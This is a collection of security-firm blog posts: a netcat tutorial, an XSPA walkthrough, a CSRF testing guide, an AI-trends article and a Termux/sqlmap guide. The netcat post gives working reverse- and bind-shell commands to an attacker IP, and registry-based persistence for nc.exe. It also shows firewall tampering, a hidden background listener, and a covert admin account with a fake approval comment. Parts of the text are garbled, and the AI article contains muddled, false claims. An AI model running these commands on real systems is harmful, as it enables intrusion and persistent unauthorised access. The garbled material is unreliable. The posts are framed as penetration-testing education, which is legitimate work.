NETCAT

NETCAtNetcat is a computer network utility used for taking access, sending access, sending and receiving files over the internet using TCP and UDP connection. This tool is very famous for debugging the network and for investigation purpose. Netcat is also known as NC or swiss army knife. It is the most critical threat to network admins, programmers and penetration testers.

NETCAT SETUP:

Setting up netcat in windows is very simple. You download Netcat for windows from the given link  https://joncraton.org/blog/46/netcat-for-windows/.

Once you downloaded it extract the file in c directory. Then just open the command prompt and navigate to the netcat directory (yes I know we are lazy, shortcut to open a command prompt from the same directory, just got to the netcat directory hold shift and right click, and you will see an option “open command windows here” ) now run nc.exe.

In Linux netcat is pre-installed. So we don’t need to worry about it. If you don’t find in Linux, open the terminal and type “apt-get install netcat”. This command will install netcat for you.

In this blog is using Kali Linux as my attacker machine and victim machine as windows 7.

PENETRATION TESTING WITH NETCAT

Netcat is used for two primary modes of operation, one is as a client, and the other is a server. These two operations are hackers favourite, and penetration testers also use these operations.

The primary usage of the two modes is connected to somewhere and listen for inbound

connect to somewhere: nc [-options] host-name port [s]  # this syntax is for netcat client mode

listen for inbound : nc -l -p port [options] [host-name] [port] # this syntax is for netcat server mode

the most commonly used options in netcat are

-c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]

-e filename                  program to exec after connect [dangerous!!]

-l                                  listen mode, for inbound connects

-n                                 numeric-only IP addresses, no DNS

-p port                       local port number

-u                                 UDP mode

-v                                 verbose [use twice to be more verbose]

-z                                 zero-I/O mode [used for scanning]

Netcat most potent options are -e prog. This option is used in server mode, which allows netcat to execute a command on the remote system. This option will enable netcat to run the specific program when clients connect to the server.

Nc -l -p 1234 -e cmd.exe        # windows

nc -l -p 1234 -e bin/sh             # Linux

These are the basics of netcat. If you are still a beginner in netcat read this article for clear understanding  http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf

let’s get into real-time penetration testing with netcat

let’s get a basic reverse shell from windows 7

nc -lvp 1234  # Kali Linux

nc.exe 192.168.0.151 1234 -e cmd.exe # windows (IP mentioned is Kali IP address)

when victim enters the command, ill get a reverse shell in Kali

 POST EXPLOITATION WITH NETCAT

post exploitation is the crucial phase of penetration testing and fun part too.So here is some fun part that we can perform using netcat.

Once we get a reverse shell from the victim system, we need to do some following steps

. That’s is maintaining the connection.

All the attackers face a big problem, which is session expiration. So here are some command s to make the session persistent.

@echo offxcopy"%systemdrive%\%username%\Desktop\nc.exe""C:\Windows\System32\" -­y         

             reg add "HKLM\soQware\microsoQ\windows\currentversion\run" /f /v"system" /t REG_SZ /d            "C:\windows\system32\nc.exe-­Ldp449 -­ecmd.exe”            

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow          protocol=UDP localport=449 

           netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow      

 program="C:\windows\system32\nc.exe "

 NOTE: this command should run as administrator

 RUNNING THE NETCAT IN BACKGROUND

Here is the vb script to run netcat in the background, so that you don’t have to wait for the user to restart their computer.

Dim objShellSet objShell = Wscript.CreateObject ("WScript.shell")objShell.run"C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

SetobjShell =  Nothing

play with firewall

netsh advfirewall set all profiles state off

Turn off windows firewall will notify the user

netsh advfirewall set allprofiles state           on       

– Turns firewall on

netsh advfirewall reset

– Reset the firewall back to  default

netsh advfirewall set all profiles firewallpolicy blockinbound,allowoutbound

– Block everything

netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block           

 dir=IN

– Open Port

netsh advfirewall firewall delete rule name=" HTTP.”

– Delete Rule

schedule tasks

we can also be able to mess with windows schedule task; we can able to create, delete and run a task.

Creating Tasks

  – SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword     

  /SC HOURLY /TN rtest1 /TR notepad

Delete  Tasks

  – SCHTASKS /Delete /TN "Backup and Restore.”       
Running Tasks

– SCHTASKS /Run /TN "StartBackup"

now let’s create and add a local user and granting with administrator right

net user /add briskinfosec Netcat /comment:"Approved through 3/07/2018 per CTO" /

fullname:"brisk info sec"

Netcat is used for scanning ports on the network.

nc  -v  192.168.0.170   - z 1-1000   # ip = target ip

OUTPUT:

root@7h3pr0xy:~# nc -v  192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 554 (rtsp) open

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

sometimes we need to randomise the port as well against the target to alert the IDS (intrusion detection system) or IPS (intrusion prevention system).

nc -v -r 192.168.0.170 -z 1-1000

OUTPUT

root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 554 (rtsp) open

While performing penetration testing less information will not help us to move forward. So we look for more details. In netcat, we have a verbose which give more info about the target.

nc -vv -r 192.168.0.170 -z 130-140

OUTPUT:

root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 130 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 134 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 133 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 140 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 132 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused

(UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused

(UNKNOWN) [192.168.0.170] 136 (?) : Connection refused

 sent 0, rcvd 0

Netcat can be used for the offensive purpose as well as defensive. If you are right programming, you can automate the executing process

NOTE: use this swiss army knife in a useful way, so no one gets hurt with a sharp edge.

Play safe and be safe

AUTHOR

Venkatesh C.S

SecurityEngineer

BriskInfoSec Technology and Consulting PVT LTD

Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Cross Site Port Attack (XSPA)

 

CROSS SITE PORT ATTACK (XSPA)

INTRODUCTION:

A web application is helpless against Cross Site Port Attack if it forms client provided URLs and does not disinfect the backend reaction got from remote servers previously sending it back to the client. The responses, in specific cases, can be concentrated to distinguish benefit accessibility (port status, flags and so forth.) and even bring information from remote administrations in unique ways.

Detecting a potential XSPA vulnerability is very simple and if the web app takes URL as input and tries to make it connect to the port and analyse the output and I have been attempting this XSPA attack on a testing app http://testphp.vulnweb.com/

Once I visited the testing site, and here I have selected the image categories option on the site as follows

Later I have selected the required image file it takes me to the URL as follow

Once I Visited this site I have started to capture the backend response using Burp Suite tool

Burp Suite is a graphical tool for testing Web application security, and It was mainly developed to provide a comprehensive solution for web application security checks. and In addition to this basic functionality, it also has some extra features such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer

I have cross checked this site using my localhost with some ports and captured the response in burp suite, and by this method, we can precisely analyse the response for each port

Here I have captured the response of the image URL and crossed check it with my localhost with port 80(HTTP), and I can see the response 200 OK (Normal response)

Once It fetches the average result, and you can also confirm this for other ports like 22(ssh), 21(ftp), 25(SMTP), 8080(https) etc. and you can check the result in browser as well.

During Port analysis, if any required port is closed, it fetches the result as

It also shows the response of 200, but it displays some warning like (failed to open) or connection refused etc. and if it shows this case of errors then you can confirm that the port is closed

In the above screenshot shows the different case of the port is opened but it shows the result without exposing the attacker IP on the server logs and it also reveals the backend service running on SSH

MITIGATION FOR XSPA ATTACK:

• Unauthorized URL’s access should be restricted
• Restrict Connectivity to the internal ports
• Whitelist IP address
• Disable Unwanted protocols and services.
• You can block your ports using firewall for better security please check the link below to block your inernal ports

Reference Link:

http://www.thewindowsclub.com/block-open-port-windows-8-firewall

CONCLUSION:

XSPA vulnerability attack mainly used to perform port scanning of a target using another vulnerable website and also an attacker can perform a DOS attack, Code Execution and other major attacks on other vulnerable  websites

Reference Link:

https://teamultimate.in/cross-site-port-attack-xspa-tutorial/

http://indiatriks.blogspot.in/2012/07/xspa-cross-site-port-attack.html

AUTHOR

RamKumar G

SecurityEngineer

BriskInfoSec Technology and Consulting PVT LTD

Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

How serious is Cross-site request forgery (XSRF or CSRF)?

 27 Dec 2017 Brisk Blogs BINT LAB

HOW SERIOUS IS CROSS-SITE REQUEST FORGERY (XSRF OR CSRF)?

Cross-site request forgery is attacking website as a legitimate and trusted user that tricks the victim submitting a malicious request. An attacker may forge a request to log the victim into a target website  CSRF, this could even lead to further damage.

The attacker often takes advantage of the fact that the user is already authenticated, but with some types of this attack. Impacts of successful CSRF exploits vary greatly based on the privileges of each victim. When targeting a normal user, a successful CSRF attack can compromise end-user data and their associated functions. Utilizing social engineering, an attacker can embed malicious HTML or JavaScript code into an email or website to request a specific ‘task URL’. The task then executes with or without the user’s knowledge, either directly or by utilizing a Cross-Site Scripting flaw  It is imperative that no XSS vulnerabilities are present to ensure that CSRF defenses can’t be circumvented

As a webmaster, however, you should not assume that you are protected from CSRF attacks when you see anti-CSRF tokens used in your web applications.

BURP SUITE:

Burp Suite is an integrated platform for performing security testing of web applications Burp to test the security of their applications. Some of Burp’s more advanced features will take further learning and experience to master It is not a point-and-click tool but is designed to be used by hands-on testers to support the testing process.

It was developed to provide a comprehensive solution for web application security checks. In addition to basic functionality, such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer A penetration tester configures their Internet browser to route traffic through the proxy which then acts as a sort of Man In The Middle by capturing and analyzing each request and response to and from the target web application.

Step: 1 Here how to test CSRF test manually configure burp suite with your browser

Step: 2 Take authenticated web application Testing Site  You can log in using the credentials test:test.

Step 3: Then value in the field you can change the name email ID PH: NO Example Name Open Burp Proxy open the Tab Intercept On

Step: 4 Update the filed Submit the request so that it is captured  Burp Proxy  the Raw

Step: 5 Right Click Go to Engagement tools Generate CSRF PoC Option

Step : 6 PoC Generated Copy the HTML Open Note pad paste the HTML

Step:7 Modified the data As Test Username Email ID abc@gmail.com

Step: 8 Then Save It has test.html Open another browser login the Test site as test user click and Open the Test.html file submit the request

Step: 9 Attack has been successfully accounting information has been changed serves as an initial check to verify whether the attack is possible web application has been altered. A successful attack shows that the web application is vulnerable to CSRF

Cross-site request forgery is an understated attack technique that can be exceedingly deadly. In some cases it can lead to the complete compromise of a web-based system. We at BriskInfosec take care of the complete   web application security   testing helping the developers to develop their website and application in a secure manner.

For further information please feel free to get in touch with us @ Contact@briskinfosec.com

AUTHOR

Surya

Security Engineer

BriskInfosec Technology and consulting PVT LTD

Follow me @ https://www.linkedin.com/in/surya-shiva-43284b137/

TOP ARTIFICIAL INTELLIGENCE TRENDS IN CYBER SECURITY

TOP ARTIFICIAL INTELLIGENCE TRENDS IN CYBER SECURITY

Artificial intelligent is defined as the study of intelligent agent and devices that perceives the environment around and takes some actions for its chance of success at some goals and it also plays an important role in all fields AI robots are one of the major invention in recent years it takes the actions, control and activities of human environment and replicates the same and AI can encompass anything from google search algorithm

In Today’s Artificial Intelligence made to perform a narrow task it’s meant to drive a car by its own but when compared to narrow AI Many researches plan to create a general (AGI or strong AI) because the narrow AI can perform each and every task of the human and it may also lead to some dangerous activities it plays a major drawback on creating a narrow AI

ADVANTAGES OF ARTIFICIAL INTELLIGENCE:

Artificial Intelligence is used in a complicate mixture of computer science, Mathematics and other complex sciences major advantage of artificial intelligence as follows

• Error Reduction
• Difficult Exploration
• Daily Application
• Digital Assistance
• Repetitive jobs
• Medical Application
• No Break

ERROR REDUCTION:

It is mainly used to detect and minimize the errors and also executes the result at higher accuracy and AI helps us to study about the concept involved in the exploration of space and AI created robots are used to transfer information across the space and robots transfers the information’s to the space are highly secured and they cannot be modified or copied by a normal human

DIFFICULT EXPLORATION:

It involves the science of robots, process of mining and other fuel exploration purposes and it acts not only in the complex behavior but also in the exploration of space due to its programming ability it can performs the process more than human’s behavior

In Mining AI places an important role to detect the exact place for digging to find out the non-artificial products like the coal, gold, silver and research made by the Goldcorp team up with the IBM Watson to develop an advanced feature by AI to find out the Non Artificial product locations

Reference Link: https://www.techemergence.com/ai-in-mining-mineral-exploration-autonomous-drills/

DAILY APPLICATION:

Computed Methods for Automated testing, Learning, reasoning and our other daily activities lies under AI. Cortana and Siri are used as a Virtual Search engine to help us out, tracking software like Map and cab booking are worked under GPS. Smartphone are on the perfect example for artificial intelligence, security chips placed in the ATM card follows AI to secure themselves from fraud

DIGITAL ASSISTANCE:

Highly advanced Organization used ‘avatar’ to minimize the work of humans and interacts with the clients and performs the task based on their requirements and many peoples started to use the robots in hotel for serving purpose and google lens is an another advanced method to connect with internet without the authentication process

REPETITIVE JOBS:

Repetitive jobs are monotonous in nature and it can be used in the purpose of machine intelligence and the machine thinks faster than humans in our life Machine Intelligence can assigned to perform some dangerous tasks because we can set some parameters for robots to perform their action it process the working methods in a secured manner and executes a better results than humans, Play Station is one of the best example when we are playing the one component is user and the another component is the AI and it capture the movement of the user and displays the same actions on the screen

MEDICAL APPLICATION:

In Medical field Doctor’s assess the patient and their health risk by the method of artificial intelligence and it guides the patient to be aware from medicine side effects, it finds a huge application in detecting and finding the neurological disorders and it capture the actions performed by the brain and nowadays in medical application it’s been developed to the digital body scanning (to scan over your whole body) in an automated manner.

Reference Link: https://www.youtube.com/watch?v=DCtAxUB1bvI

NO BREAK:

Machines unlike humans do not requires frequents break and refreshments they are performed for long hours and can continuously perform without getting bored or distracted or even tired

DISADVANTAGES OF ARTIFICIAL INTELLIGENCE

• High Cost
• No Replicating humans
• No improvement with experience
• Unemployment

HIGH COST:

Creation of the Artificial Intelligence machines or robots charges high cost when compared to the other automated machines and the repair and maintenance require high cost and AI also needs some upgrades to develop its level day by day and when the AI machine gets breakdown or any maintenance report leads to high cost to recover the codes (or) to repair the machine so it considered to be the major drawback of Artificial Intelligence

NO REPLICATING HUMANS:

Machine do not have emotions it leads to the drawback of AI because at certain situations they do not know to take the correct decisions at a specific time. The either perform incorrectly or breakdown in such situations

NO IMPROVEMENT WITH EXPERIENCE:

Unlike humans artificial intelligence cannot be calculates its experience based on its time they are different from humans and AI stores lots of data but it fails to access at time when it is needed and it does not any care or emotional feeling like human and it’s one of the drawback of AI from humans, they fail to distinguish between the hardworking individual and inefficient individual

UNEMPLOYMENT:

Replace of humans with machines lead to the large scale of unemployment and Unemployment is one of the most socially undesirable phenomenon and Humans are becoming lazy nowadays and they started to use machine to complete their work and this lead to the unemployment of many peoples and if humans starts thinking in a destructive way it leads to the create havoc with this machine, when artificial intelligence takes plays in a destructive way it leads to any kind of massive destructions in the world

ROLE OF AI IN CYBER SECURITY:

Machine Learning and artificial Intelligence plays an important role across industries and applications that has been used for computing power, data collections and analyzing against vulnerabilities etc.

By using AI we can perform any kinds of exploits and it detects the vulnerabilities in an easier and automated way in many cyber security organization’s employees were started to Learn AI and Machine Learning to develop their standards to next level in Artificial Intelligence

 TOP TRENDS IN CYBER SECURITY:

GDPR (GENERAL DATA PROTECTION REGULATION):

It’s mainly prepared for the European Union’s, of how to store your personal Data in a secured manner and it also mainly created for the EU Citizens because they are not complete with it and many Organization are expected to start GDPR for May.

AI AND MACHINE LEARNING ON CYBER DEFENSE:

AI and Machine learning plays an important role in cyber defense and machine learning modules detects the exact moves of the cyber security criminals and it helps the InfoSec professional’s in a greater way

HANDLING DATA BREACHES:

It’s impossible to eradicate data breaches completely and many organization’s started to control data breaches with some condition’s through monitoring IOT Devices to get control from DDOS attacks or misdirecting potential victim’s and failing to patch a known vulnerabilities and we can hope that the data’s could be  entirely controlled in the upcoming years

DEVELOPING A COMMON LANGUAGE:

There is a positive growth of development in cybersecurity realm and not least the creation and adoption of thing’s like NIST Cybersecurity framework and more cybersecurity experts and organization’s planning to develop a common language in the field of cybersecurity to make the process easier.

APPLICATION TESTING:

Application testing leads to the large amount of the data breaches because the security testing in application’s are not properly maintained and to control these everyone should put a  fresh efforts into patching and app testing in the coming year, and by this we would see a dramatic drop in data breaches.

ARTIFICIAL INTELLIGENCE TOOLS:

• Google Now
• Intelligent Personal Assistants
• Crystal knows
• Textio
• Enlitic
• Digital Genius
• TAMR
• Intraspexion
• Recorded Future
• Conversica

COMPANIES TRIES TO IMPROVE AI IN CYBER SECURITY:

AI FOCUS ON MALWARE:

AI Mainly focus on malware rather than exploits it checks for every suspicious file within the folder or checks by CPU instructions and or by API imports and AI can detect the malware by certain limitations in Memory or by I/O Operations and AI focus starts from the exploitation if any malware is sent to the computer it starts from the exploitation and later it can be passed through malicious shellcode can be passed through browser or by Microsoft office (or) Adobe Reader and finally in Malware AI Detection AI detects the malware by checking its memory level and by I/O operations Once they are not up to its level they are considered to be the malicious one.

After Malware detection AI can also be bypassed using AI Evasion techniques and by this process it redirects its way by detecting against AV and bypasses the malware detection on AI and here by using this techniques the AI fails to detects the malware and they are been explained as follows.

But Still Now AI Fails to detect the Zero Day Attacks and they are many methods are been developed on AI to detect advanced threats and Zero Day but it fails but the development on detecting Advanced level threats are going on in Progress

SUB INDUSTRY ARTIFICIAL INTELLIGENCE:

Artificial Intelligence statistics across every industries is been described in the above figure

BOOKS ON ARTIFICIAL INTELLIGENCE:

Reference Link: http://bigdata-madesimple.com/20-free-books-to-get-started-with-artificial-intelligence/

CONCLUSION:

As cyberattacks become more sophisticated, cybersecurity teams are tasked with adapting their technology to find new anomaliesOrganizations face millions of threats each day making is impossible for a security researcher to analyze and categorize them. This task can be done by using Machine Learning in an efficient way.

However, a more efficient cybersecurity process can help reduce costs and help streamline the process. Artificial intelligence and machine learning can rapidly and efficiently detect threats, resolve them, and prevent them in the shortest amount of time possible with the greatest potential for resolution.

AUTHOR

RamKumar

Security Engineer

BriskInfosec Technology and Consulting PVT LTD

Follow me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

How your employee’s smartphones are serious threat to your organization?

HOW YOUR EMPLOYEE’S SMARTPHONES ARE SERIOUS THREAT TO YOUR ORGANIZATION?

Employee’s smartphones are a serious threat to the organization since it is allowed to use in the production environment. Android is the most popular mobile OS with more than 60% market share. As Android is ruling smartphone and tablet markets, developers are also creating more apps for Android devices. This is the reason why the Android market has millions of apps. Like websites, apps also need penetration testing to check for various vulnerabilities. Security testing for Android apps will need to have a penetration testing environment on your Android device.

Almost all Useful Hacking Tools, Scripts can be used on Your Android Mobile. Termux is a Powerful app which can be used to install useful packages, Hacking Tools On your Android

By installing this program, you can hack anything that comes to mind. From targeting websites, hacking computers, sniffing networks, brute forcing passwords, information gathering and many more.

For more details about termux can be found in their official termux page. Link for the has given below

https://wiki.termux.com/wiki/Main_Page

Installation

Google Play: https://play.google.com/store/apps/details?id=com.termux
F-Droid: https://f-droid.org/packages/com.termux/

INSTALLING PACKAGES FROM THE REPOSITORY

To install your favorite tool in termux you can run

pkg install <package name>
Example
pkg install nmap 
To get list of available packages in termux, run
pkg list-all
To search a package
pkg search nmap
To show more info about a package
pkg show nmap

INSTALLING .DEB FILES

Manual way of installing .deb files

pkg install ./package.deb

or

dpkg -i ./package.deb

Termux packages are built using Ubuntu 16.10, so this means that developers can compile any existing software from their machine and then add it to the package manager for anyone to download. It is a very simple and elegant solution to what otherwise could be a complex and difficult problem. One amazing side effect of this is that once the software is compiled, you have full-fledged versions of the software rather than half-baked, ported versions of desktop Linux packages.

Termux gives you a bash terminal by default, but if you are like me and prefer Zsh for its advanced features, the FISH shell is also available. Multiple different shell types are certainly welcome.

Anyone that has used a terminal emulator application on Android knows the pain when you need to enter special keys to control the terminal such as CTRL or ESC. These keys aren’t displayed on the standard touch keyboards used on android devices (save for Hacker Keyboard). Termux developer Fredrik Fornwall, though, has a very novel solution to this. He has bound CTRL to the Volume DOWN key and other special keys like ESC to the Volume UP key. Therefore, by pressing Volume Up + the touch keyboard ‘L’ you can input the terminal command CTRL + ‘L’ which clears the terminal window. The ESC key is sent by pressing volume UP + ‘E’ key for example. You can view all the keys available in Termux on the developer’s website

FEATURES OF TERMUX API

Secure. Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution.

Feature packed. Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox. Access API endpoints with curl and use rsync to store backups of your contact list on a remote server.

Customizable. Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles?

Explorable. Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux – install man pages on your phone and read them in one session while experimenting with them in another.

With batteries included. Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby, and Node.js are all available.

Ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to – Termux supports keyboard shortcuts and has full mouse support.

Tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and storage are available if you get stuck and need to debug.

term up has a list of command, all those can be found at link given

https://github.com/termux/termux-packages/blob/master/packages/command-not-found/commands.h

INSTALL SQLMAP

Let’s do a practical session on how to install sqlmap on our android device.

As we know that sqlmap is a most amazing website vulnerability scanning tool which is mostly used by pen testers, Hackers, Security Researchers and so on.

Sqlmap is written in Python programming language environment, so that we need to have python installed in termux ,to install python in termux, run the command

pkg install python2

once the installation is complete, we need to install git package because we are going to download sqlmap from the git repository

to install git in termux

run the command :

pkg install git

now its time to install our favorite tool sqlmap

so run: git clone https://github.com/sqlmapproject/sqlmap.git

  the download process and the installation process will take some time, once it’s been done

then navigate to the sqlmap directory using the following command

cd

then list the files using ls command

now navigate to the sqlmap-dev folder using “cd sqlmap-dev”

once you entered into the folder, list the files using ls command

so you will see the executable file of sqlmap

since sqlmap run under python, so we need to run using the following command

python2 sqlmap.py

bingo … now we have successfully installed sqlmap on our android device itself. Using the same method we can able install different tools on our android device.

Termux: Hackers Perspective

Before termux was originated, hackers were using so many application to perform different attacks. But now everything has come into single app, which is termux. Now this the time where hackers will take over every system easily.

Hackers install Kali Linux on their android phone but it requires some time and patient, but this app looks alternative for the kali.

So now hackers got the best handy tool. Hackers can able to get into your network and he/she can able to perform post exploitation techniques such as MITM, exploitation, etc.

Mitigation from hackers attacks

• The users need to take necessary precautions in order to protect their devices, as the hackers can exploit any network using termux without the knowledge of the user.
• Patch anything and everything. Keep in mind that your secure environment from a month ago is now wide open thanks to Patch Tuesday
• The second Tuesday of each month when Microsoft releases security patches.
• Some months there are in excess of 30 patches released. That’s 30 potential vulnerabilities. Miss a month … 60 … two months … 120. Hackers are always finding new attack holes and methods into the system software.
• Patches and new versions of system software are frequently released to fix these newfound problems.
• Hackers are a close-knit community and they are more than willing to share your network’s flaws with their neighbors.

Be prepared and Be secured!!!

Author

Venkatesh C>S
Security Engineer

BriskInfosec Technology and consulting PVT LTD

Follow me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/